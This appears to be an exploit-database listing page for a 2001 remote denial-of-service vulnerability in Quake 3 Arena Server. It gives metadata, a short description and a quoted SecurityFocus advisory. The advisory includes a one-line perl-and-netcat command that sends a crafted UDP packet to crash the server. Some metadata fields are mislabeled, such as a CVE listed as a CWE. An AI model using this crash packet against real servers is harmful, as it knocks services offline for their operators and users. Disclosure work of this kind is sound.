header-logo
Suggest Exploit
vendor:
Quake 3 Arena Server
by:
SecurityFocus
7.5
CVSS
HIGH
Remote Denial of Service
20
CWE
Product Name: Quake 3 Arena Server
Affected Version From: Quake 3 Arena Server
Affected Version To: Quake 3 Arena Server
Patch Exists: No
Related CWE: CVE-2001-0456
CPE: o:id_software:quake_3_arena_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2001

Quake3 Arena Server Remote Denial of Service

A malicious user can remotely crash a Quake 3 Server by sending a specially crafted packet to the server. The packet contains the string 'connectre' preceded by four bytes of 255. This packet can be sent using the netcat utility. Execution of arbitrary code may be possible as well.

Mitigation:

No known mitigation or remediation for this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/3123/info

Quake3 Arena Server is a software package designed to host multiple Quake 3 players over a network for interactive play.

A vulnerability exists in this software that can allow a malicious user to remotely crash a Quake 3 Server. Execution of arbitrary code may be possible as well. 

perl -wle 'printf("%c%c%c%c%s",255,255,255,255,"connectre")' | nc -u 1.1.1.1

Navigation

Suggest Exploit

Services By CQR